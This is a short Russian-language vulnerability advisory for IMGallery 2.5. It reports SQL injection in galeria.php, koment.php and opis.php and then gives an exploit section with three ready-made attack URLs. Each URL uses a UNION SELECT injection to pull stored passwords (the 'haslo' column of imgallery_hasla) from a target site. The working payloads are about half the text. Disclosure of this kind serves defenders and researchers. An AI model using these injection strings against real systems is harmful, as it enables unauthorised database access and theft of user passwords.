Программа: IMGallery 2.5
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных сценариями galeria.php, koment.php и opis.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Эксплоит:
http://[attacked_box]/[imgallery]/galeria.php?start=0&kategoria= '+union+select+haslo,2,3+from+imgallery_hasla/*
http://[attacked_box]/[imgallery]/popup/koment.php?id_phot= '-1+union+select+1,2,3,4,haslo+from+imgallery_hasla/*
http://[attacked_box]/[imgallery]/popup/opis.php?id_phot= '+union+select+haslo+from+imgallery_hasla/*
